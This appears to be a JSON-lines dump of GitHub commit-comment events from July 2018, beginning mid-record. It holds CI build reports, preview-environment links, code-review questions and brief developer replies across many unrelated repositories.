[logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 681s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 1068s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-31T22:11:32Z"}
{"id":"8046987109","type":"CommitCommentEvent","actor":{"login":"gsjaardema"},"repo":{"name":"Unidata/netcdf-c"},"payload":{"comment":{"id":29912584,"position":null,"line":null,"path":null,"commit_id":"bf6ae6c59153dd2d36dbdf7793e29f824a98a20d","created_at":"2018-07-31T22:13:32Z","updated_at":"2018-07-31T22:13:32Z","author_association":"CONTRIBUTOR","body":"Not sure if this is the cause, but my CMake builds are now failing and `oc_print` is in all the error messages...  I will take a closer look, but they were all working a few hours ago..."}},"created_at":"2018-07-31T22:13:32Z"}
{"id":"8046989629","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29912597,"position":null,"line":null,"path":null,"commit_id":"27eba341513fb3cf9b68ad88c726db2a36775544","created_at":"2018-07-31T22:14:11Z","updated_at":"2018-07-31T22:14:11Z","author_association":"NONE","body":"158270028_Issue#6422 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T22:14:11Z"}
{"id":"8046991612","type":"CommitCommentEvent","actor":{"login":"rohitoist"},"repo":{"name":"rohitoist/sprin4intro"},"payload":{"comment":{"id":29912603,"position":null,"line":null,"path":null,"commit_id":"030948391f397126fb69f5f2aa440dcde4a80120","created_at":"2018-07-31T22:14:41Z","updated_at":"2018-07-31T22:14:41Z","author_association":"OWNER","body":"Added comment"}},"created_at":"2018-07-31T22:14:41Z"}
{"id":"8046996007","type":"CommitCommentEvent","actor":{"login":"daniel54004"},"repo":{"name":"cmcpasserby/pbUDK"},"payload":{"comment":{"id":29912620,"position":null,"line":null,"path":null,"commit_id":"4d608b7460263e77f3c10745ef95db983048b0e6","created_at":"2018-07-31T22:15:46Z","updated_at":"2018-07-31T22:15:46Z","author_association":"NONE","body":"Hello! I ask you to do for MAYA 2018. I will be very grateful! "}},"created_at":"2018-07-31T22:15:46Z"}
{"id":"8047003300","type":"CommitCommentEvent","actor":{"login":"deathwinger"},"repo":{"name":"deathwinger/demo"},"payload":{"comment":{"id":29912638,"position":null,"line":null,"path":null,"commit_id":"1b2d0da3935f19d2780072f689b3703c30c5d124","created_at":"2018-07-31T22:17:36Z","updated_at":"2018-07-31T22:17:36Z","author_association":"OWNER","body":"What is this? What is really this?"}},"created_at":"2018-07-31T22:17:36Z"}
{"id":"8047005622","type":"CommitCommentEvent","actor":{"login":"wendorf"},"repo":{"name":"wendorf/charts"},"payload":{"comment":{"id":29912651,"position":6,"line":62,"path":"stable/concourse/templates/web-deployment.yaml","commit_id":"1e1793c7e503b055cc3b1e5f17a66463862e6471","created_at":"2018-07-31T22:18:12Z","updated_at":"2018-07-31T22:18:12Z","author_association":"OWNER","body":"Got an answer: It's just comma separated."}},"created_at":"2018-07-31T22:18:12Z"}
{"id":"8047007014","type":"CommitCommentEvent","actor":{"login":"donomans"},"repo":{"name":"FunnelDash/funnel-builder"},"payload":{"comment":{"id":29912656,"position":null,"line":null,"path":null,"commit_id":"d00b95a31b751ebb409f15504ba7f3e1a5520455","created_at":"2018-07-31T22:18:34Z","updated_at":"2018-07-31T22:18:34Z","author_association":"MEMBER","body":"perfect"}},"created_at":"2018-07-31T22:18:34Z"}
{"id":"8047029685","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29912738,"position":null,"line":null,"path":null,"commit_id":"8e82bbb2a49298d029ccd8c85f9f0b17a63edb0f","created_at":"2018-07-31T22:24:37Z","updated_at":"2018-07-31T22:24:37Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1056](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1056).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1056-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T22:24:37Z"}
{"id":"8047037961","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29912773,"position":null,"line":null,"path":null,"commit_id":"5c518c09828073dda9328b001a6fbc182db30d88","created_at":"2018-07-31T22:26:54Z","updated_at":"2018-07-31T22:26:54Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-19](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-19).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-19-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-31T22:26:54Z"}
{"id":"8047043876","type":"CommitCommentEvent","actor":{"login":"bclothier"},"repo":{"name":"rubberduck-vba/Rubberduck"},"payload":{"comment":{"id":29912790,"position":34,"line":118,"path":"Rubberduck.API/VBA/Parser.cs","commit_id":"ad863d68b0183e6fcb43887917c187c74e980a01","created_at":"2018-07-31T22:28:34Z","updated_at":"2018-07-31T22:28:34Z","author_association":"CONTRIBUTOR","body":"Typo; should be `Handler`"}},"created_at":"2018-07-31T22:28:34Z"}
{"id":"8047047529","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29912802,"position":null,"line":null,"path":null,"commit_id":"b6722ef62b4b47a3bc166ed7f0e3ab2bae2ee679","created_at":"2018-07-31T22:29:37Z","updated_at":"2018-07-31T22:29:37Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1058](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1058).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1058-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T22:29:37Z"}
{"id":"8047049564","type":"CommitCommentEvent","actor":{"login":"BalusC"},"repo":{"name":"omnifaces/omnipersistence"},"payload":{"comment":{"id":29912812,"position":null,"line":null,"path":null,"commit_id":"cd0f318eb2c97c9113eb425920227310106e0678","created_at":"2018-07-31T22:30:11Z","updated_at":"2018-07-31T22:30:11Z","author_association":"MEMBER","body":"https://github.com/omnifaces/optimusfaces/issues/16"}},"created_at":"2018-07-31T22:30:11Z"}
{"id":"8047051589","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29912819,"position":null,"line":null,"path":null,"commit_id":"4d55711dc0f3de1c982906fb6bafe343de713161","created_at":"2018-07-31T22:30:42Z","updated_at":"2018-07-31T22:30:42Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-311](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-311).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-311-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T22:30:42Z"}
{"id":"8047055438","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29912834,"position":13,"line":13,"path":"a_first_example/first_example_spec.rb","commit_id":"7a45e9baff1e3e67b6ba28d87fc62600389a1011","created_at":"2018-07-31T22:31:45Z","updated_at":"2018-07-31T22:31:45Z","author_association":"NONE","body":"I'm noticing some patterns. \r\nIn #setup, you create your Customer and 3 instances of Movie. #setup is the only place that directly class those classes.\r\nLater, you use @joe in every single test. Cool. You then pass a movie object to the Rental on the first line -- for example: Rental.new(@child_movie, 3) and then add the rental to @joe. "}},"created_at":"2018-07-31T22:31:45Z"}
{"id":"8047056553","type":"CommitCommentEvent","actor":{"login":"samirapu143"},"repo":{"name":"samirapu143/SignalFaultPredictor"},"payload":{"comment":{"id":29912838,"position":null,"line":null,"path":null,"commit_id":"a4d8d1048b4fede03ffaaca3ef3cd2f4ca8891bf","created_at":"2018-07-31T22:32:04Z","updated_at":"2018-07-31T22:32:04Z","author_association":"OWNER","body":"capstone write up"}},"created_at":"2018-07-31T22:32:04Z"}
{"id":"8047057384","type":"CommitCommentEvent","actor":{"login":"King7ipthem"},"repo":{"name":"rakion99/Axon"},"payload":{"comment":{"id":29912841,"position":null,"line":null,"path":null,"commit_id":"294863162089a113332f72865784b07327d9d4b6","created_at":"2018-07-31T22:32:17Z","updated_at":"2018-07-31T22:32:17Z","author_association":"NONE","body":"copy it Ok Cool"}},"created_at":"2018-07-31T22:32:17Z"}
{"id":"8047061063","type":"CommitCommentEvent","actor":{"login":"calebsander"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":29912854,"position":null,"line":null,"path":null,"commit_id":"b895614c5561b85cd87c6f8b8e5f7d0dda3f7e3c","created_at":"2018-07-31T22:33:18Z","updated_at":"2018-07-31T22:33:18Z","author_association":"NONE","body":"Tests are failing on 3 baselines: https://travis-ci.org/Microsoft/TypeScript/jobs/410544227#L546"}},"created_at":"2018-07-31T22:33:18Z"}
{"id":"8047063317","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29912860,"position":34,"line":34,"path":"a_first_example/first_example_spec.rb","commit_id":"7a45e9baff1e3e67b6ba28d87fc62600389a1011","created_at":"2018-07-31T22:33:56Z","updated_at":"2018-07-31T22:33:56Z","author_association":"NONE","body":"Each test calls #add_rental then looks at @joe.statement. \r\nHow do you feel about this? Is it a good test pattern to call one method (#add_rental) and test its correctness by calling another method (#statement)?"}},"created_at":"2018-07-31T22:33:56Z"}
{"id":"8047065923","type":"CommitCommentEvent","actor":{"login":"King7ipthem"},"repo":{"name":"rakion99/Axon"},"payload":{"comment":{"id":29912874,"position":null,"line":null,"path":null,"commit_id":"294863162089a113332f72865784b07327d9d4b6","created_at":"2018-07-31T22:34:40Z","updated_at":"2018-07-31T22:34:40Z","author_association":"NONE","body":"i have to delete something or like just pasting"}},"created_at":"2018-07-31T22:34:40Z"}
{"id":"8047066337","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29912876,"position":97,"line":97,"path":"a_first_example/first_example_spec.rb","commit_id":"7a45e9baff1e3e67b6ba28d87fc62600389a1011","created_at":"2018-07-31T22:34:47Z","updated_at":"2018-07-31T22:34:47Z","author_association":"NONE","body":"What do the test names mean? test_2day_new_4day_child_3day_reg"}},"created_at":"2018-07-31T22:34:47Z"}
{"id":"8047070080","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29912889,"position":1,"line":1,"path":"a_first_example/first_example.rb","commit_id":"7a45e9baff1e3e67b6ba28d87fc62600389a1011","created_at":"2018-07-31T22:35:50Z","updated_at":"2018-07-31T22:35:50Z","author_association":"NONE","body":"Can you summarize the objects here and their responsibilities?"}},"created_at":"2018-07-31T22:35:50Z"}
{"id":"8047070201","type":"CommitCommentEvent","actor":{"login":"Tiloaria"},"repo":{"name":"flerdacodeu/CodeU-2018-Group1"},"payload":{"comment":{"id":29912890,"position":93,"line":93,"path":"group/assignment6/Assignment6.cpp","commit_id":"75c33f3f2e4e40a376a037b57df926b96c6905d3","created_at":"2018-07-31T22:35:52Z","updated_at":"2018-07-31T22:35:52Z","author_association":"COLLABORATOR","body":"It's hard to test this function if it returns void. "}},"created_at":"2018-07-31T22:35:52Z"}
{"id":"8047077776","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29912916,"position":null,"line":null,"path":null,"commit_id":"d55b07fa3ebfc71e302e7396e0d755df378e8040","created_at":"2018-07-31T22:38:00Z","updated_at":"2018-07-31T22:38:00Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/d55b07fa3ebfc71e302e7396e0d755df378e8040/index.html"}},"created_at":"2018-07-31T22:38:00Z"}
{"id":"8047078252","type":"CommitCommentEvent","actor":{"login":"WardF"},"repo":{"name":"Unidata/netcdf-c"},"payload":{"comment":{"id":29912918,"position":null,"line":null,"path":null,"commit_id":"bf6ae6c59153dd2d36dbdf7793e29f824a98a20d","created_at":"2018-07-31T22:38:08Z","updated_at":"2018-07-31T22:38:08Z","author_association":"MEMBER","body":"Interesting.  Not seeing any failures on my side, what's the error message, out of curiosity?\r\n"}},"created_at":"2018-07-31T22:38:08Z"}
{"id":"8047078595","type":"CommitCommentEvent","actor":{"login":"Stylite"},"repo":{"name":"Terminal/DiscordForkAppdata"},"payload":{"comment":{"id":29912919,"position":null,"line":null,"path":null,"commit_id":"6b3d46cac9e6df5b6ccfa3ed316fbde50fb4d996","created_at":"2018-07-31T22:38:13Z","updated_at":"2018-07-31T22:38:13Z","author_association":"MEMBER","body":"i'm a bot now. :^)"}},"created_at":"2018-07-31T22:38:13Z"}
{"id":"8047079450","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29912927,"position":3,"line":3,"path":"a_first_example/notes_from_refactoing_ruby.md","commit_id":"cece5872ac35a32ab41fdd04def53ae3201cbdd9","created_at":"2018-07-31T22:38:27Z","updated_at":"2018-07-31T22:38:27Z","author_association":"NONE","body":"Can you summarize for our listeners?"}},"created_at":"2018-07-31T22:38:27Z"}
{"id":"8047081728","type":"CommitCommentEvent","actor":{"login":"farmio"},"repo":{"name":"farmio/node-eibd"},"payload":{"comment":{"id":29912931,"position":null,"line":null,"path":null,"commit_id":"5e65bf29105f22b20960909cce0011e8ec855877","created_at":"2018-07-31T22:39:08Z","updated_at":"2018-07-31T22:39:08Z","author_association":"OWNER","body":"#snowdd1/homebridge-knx/95 "}},"created_at":"2018-07-31T22:39:08Z"}
{"id":"8047081834","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29912932,"position":4,"line":39,"path":"a_first_example/first_example.rb","commit_id":"2bb71cf34ad8eebcf80897523b159b3623c7aad6","created_at":"2018-07-31T22:39:09Z","updated_at":"2018-07-31T22:39:09Z","author_association":"NONE","body":"Why did you choose rental over element?"}},"created_at":"2018-07-31T22:39:09Z"}
{"id":"8047082422","type":"CommitCommentEvent","actor":{"login":"King7ipthem"},"repo":{"name":"rakion99/Axon"},"payload":{"comment":{"id":29912939,"position":null,"line":null,"path":null,"commit_id":"294863162089a113332f72865784b07327d9d4b6","created_at":"2018-07-31T22:39:20Z","updated_at":"2018-07-31T22:39:20Z","author_association":"NONE","body":"tutorial please"}},"created_at":"2018-07-31T22:39:20Z"}
{"id":"8047084733","type":"CommitCommentEvent","actor":{"login":"gsjaardema"},"repo":{"name":"Unidata/netcdf-c"},"payload":{"comment":{"id":29912947,"position":null,"line":null,"path":null,"commit_id":"bf6ae6c59153dd2d36dbdf7793e29f824a98a20d","created_at":"2018-07-31T22:40:01Z","updated_at":"2018-07-31T22:40:01Z","author_association":"CONTRIBUTOR","body":"Lots of missing symbols with oc in the name.  Build is with dap disabled.\nNot at computer now so can’t give full details\n\n.. greg\n\nOn Tue, Jul 31, 2018 at 4:38 PM Ward Fisher <notifications@github.com>\nwrote:\n\n> Interesting. Not seeing any failures on my side, what's the error message,\n> out of curiosity?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Unidata/netcdf-c/commit/bf6ae6c59153dd2d36dbdf7793e29f824a98a20d#commitcomment-29912918>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA2xDubjPok1FBi2Cj_B7C7Y3dLv5HLrks5uMNxRgaJpZM4VpfmU>\n> .\n>\n"}},"created_at":"2018-07-31T22:40:01Z"}
{"id":"8047086590","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29912956,"position":null,"line":null,"path":null,"commit_id":"27eba341513fb3cf9b68ad88c726db2a36775544","created_at":"2018-07-31T22:40:31Z","updated_at":"2018-07-31T22:40:31Z","author_association":"NONE","body":"158270028_Issue#6422 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2997 of 2997 tests passed, 3 test warnings)\n\nMessages:\n\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n * 2 tests had: BND diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T22:40:31Z"}
{"id":"8047088093","type":"CommitCommentEvent","actor":{"login":"samanthagatt"},"repo":{"name":"samanthagatt/ios-reading-list"},"payload":{"comment":{"id":29912971,"position":null,"line":null,"path":null,"commit_id":"fb42fb8052c91d44f1994e935813dc46eeab27c9","created_at":"2018-07-31T22:40:57Z","updated_at":"2018-07-31T22:40:57Z","author_association":"OWNER","body":"Interesting observation: the sorting method I used prioritizes capital letters over lowercases so a string that starts with \"B\" would always come before a string that starts with \"a\"."}},"created_at":"2018-07-31T22:40:57Z"}
{"id":"8047090713","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29912985,"position":null,"line":null,"path":null,"commit_id":"ca37f5981899f1dd42ced2efd423272af28079de","created_at":"2018-07-31T22:41:43Z","updated_at":"2018-07-31T22:41:43Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1061](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1061).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1061-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T22:41:43Z"}
{"id":"8047095365","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29912994,"position":5,"line":45,"path":"a_first_example/first_example.rb","commit_id":"a17cb0e17c4e38bdbf91df6aee747c4e853fcb80","created_at":"2018-07-31T22:43:04Z","updated_at":"2018-07-31T22:43:04Z","author_association":"NONE","body":"For our listeners: what did you do here? Why move this into a method?"}},"created_at":"2018-07-31T22:43:04Z"}
{"id":"8047098637","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29913010,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-31T22:44:01Z","updated_at":"2018-07-31T22:44:01Z","author_association":"NONE","body":"http://t.me/HrbeAirDropBot?start=568459030 ($70)\n\nOn Tue, Jul 31, 2018 at 5:10 PM, icocu <notifications@github.com> wrote:\n\n> very nice\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29911730>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXUFnXZoFIpF3IbbRyaYUPcg8R51Bks5uMMfNgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-31T22:44:01Z"}
{"id":"8047098647","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29913011,"position":null,"line":null,"path":null,"commit_id":"ab1a63b6b0cfd85ac2f99861781e1c28f71bce99","created_at":"2018-07-31T22:44:02Z","updated_at":"2018-07-31T22:44:02Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1062](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1062).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1062-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T22:44:02Z"}
{"id":"8047099890","type":"CommitCommentEvent","actor":{"login":"Nizar98"},"repo":{"name":"Nizar98/NosCore"},"payload":{"comment":{"id":29913019,"position":258,"line":139,"path":"src/NosCore.Shared/Resource/LocalizedResources.de.resx","commit_id":"0ccd6a6d58f3cf5068ceb096bfbde65a389dccb5","created_at":"2018-07-31T22:44:23Z","updated_at":"2018-07-31T22:44:23Z","author_association":"OWNER","body":"Authentizität ist Fehlerhaft"}},"created_at":"2018-07-31T22:44:23Z"}
{"id":"8047100052","type":"CommitCommentEvent","actor":{"login":"konurr"},"repo":{"name":"ahstn/atlas"},"payload":{"comment":{"id":29913021,"position":5,"line":26,"path":"pkg/git/branch.go","commit_id":"634b89555877446e5432104f9f42dac40c43796a","created_at":"2018-07-31T22:44:25Z","updated_at":"2018-07-31T22:44:25Z","author_association":"COLLABORATOR","body":"@ahstn +1 visibility"}},"created_at":"2018-07-31T22:44:25Z"}
{"id":"8047100351","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29913027,"position":null,"line":null,"path":null,"commit_id":"688128aee04346a2f3e54f5b4808d95a7d137090","created_at":"2018-07-31T22:44:31Z","updated_at":"2018-07-31T22:44:31Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2864 of 2954 tests passed, 13 test warnings)\n\nMessages:\n\n * 67 tests had: BND diffs.\n * 61 tests had: MTD diffs.\n * 68 tests had: RDD diffs.\n * 57 tests had: AUD diffs.\n * 71 tests had: EIO diffs.\n * 61 tests had: ERR diffs.\n * 68 tests had: ESO big diffs.\n * 56 tests had: MDD diffs.\n * 59 tests had: MTR big diffs.\n * 67 tests had: Table big diffs.\n * 3 tests had: ESO small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 658\n * Failed: 1\n\nintegration Test Summary\n * Passed: 607\n * Failed: 19\n\nregression Test Summary\n * Passed: 554\n * Failed: 70\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-688128aee04346a2f3e54f5b4808d95a7d137090-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-688128aee04346a2f3e54f5b4808d95a7d137090-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.95%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T22:44:31Z"}
{"id":"8047100468","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29913030,"position":null,"line":null,"path":null,"commit_id":"98d67805effcc1bcfbd982d0ee6f016aa647916e","created_at":"2018-07-31T22:44:33Z","updated_at":"2018-07-31T22:44:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1064](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1064).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1064-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T22:44:33Z"}
{"id":"8047106577","type":"CommitCommentEvent","actor":{"login":"MrBlazzar"},"repo":{"name":"OWBDevTeam/mod"},"payload":{"comment":{"id":29913051,"position":null,"line":null,"path":null,"commit_id":"fc347b4c0958bb6f9e8af506219aca9d1cee64aa","created_at":"2018-07-31T22:46:22Z","updated_at":"2018-07-31T22:46:22Z","author_association":"CONTRIBUTOR","body":"Sorry didn't describe what I did here:\r\n\r\nAdded loc for settler ideas:\r\nsettler_council_of_minds\r\nsettlercleanwater\r\nsettlerpowerful\r\nsettleradvanced\r\nsettlerwealthy\r\nsettlerbodyguards\r\n\r\nAdded loc for raider idea raider_raid_workshops\r\n\r\nAdded loc for BOS idea powerarmourdevelopment"}},"created_at":"2018-07-31T22:46:22Z"}
{"id":"8047107360","type":"CommitCommentEvent","actor":{"login":"Nizar98"},"repo":{"name":"Nizar98/NosCore"},"payload":{"comment":{"id":29913055,"position":261,"line":142,"path":"src/NosCore.Shared/Resource/LocalizedResources.de.resx","commit_id":"0ccd6a6d58f3cf5068ceb096bfbde65a389dccb5","created_at":"2018-07-31T22:46:36Z","updated_at":"2018-07-31T22:46:36Z","author_association":"OWNER","body":"Authentifizierung Erfolgreich"}},"created_at":"2018-07-31T22:46:36Z"}
{"id":"8047109279","type":"CommitCommentEvent","actor":{"login":"wngjw"},"repo":{"name":"wngjw/exogig"},"payload":{"comment":{"id":29913059,"position":null,"line":null,"path":null,"commit_id":"9efeab47413bcf968d133b9beade96348cac6d9e","created_at":"2018-07-31T22:47:09Z","updated_at":"2018-07-31T22:47:09Z","author_association":"OWNER","body":"Ah yes the days of pushing straight to master"}},"created_at":"2018-07-31T22:47:09Z"}
{"id":"8047109875","type":"CommitCommentEvent","actor":{"login":"Nizar98"},"repo":{"name":"Nizar98/NosCore"},"payload":{"comment":{"id":29913060,"position":288,"line":169,"path":"src/NosCore.Shared/Resource/LocalizedResources.de.resx","commit_id":"0ccd6a6d58f3cf5068ceb096bfbde65a389dccb5","created_at":"2018-07-31T22:47:18Z","updated_at":"2018-07-31T22:47:18Z","author_association":"OWNER","body":"Client Verbunden"}},"created_at":"2018-07-31T22:47:18Z"}
{"id":"8047110081","type":"CommitCommentEvent","actor":{"login":"Etothepowerof26"},"repo":{"name":"Re-Dream/darkrpmodification"},"payload":{"comment":{"id":29913061,"position":null,"line":null,"path":null,"commit_id":"5eb817cf5a28bd99f4ad55e782a42c9c8d5df0e7","created_at":"2018-07-31T22:47:22Z","updated_at":"2018-07-31T22:47:22Z","author_association":"NONE","body":".. hopefully..."}},"created_at":"2018-07-31T22:47:22Z"}
{"id":"8047117330","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29913082,"position":null,"line":null,"path":null,"commit_id":"417d62693c4bfc42273a44ffa25551b373da7edf","created_at":"2018-07-31T22:49:28Z","updated_at":"2018-07-31T22:49:28Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-24](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-24).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-24-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-31T22:49:28Z"}
{"id":"8047118978","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29913086,"position":null,"line":null,"path":null,"commit_id":"ff61629c7dfd8b55a64a1438053257c46645275c","created_at":"2018-07-31T22:49:56Z","updated_at":"2018-07-31T22:49:56Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-606](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-606).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-606-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T22:49:56Z"}
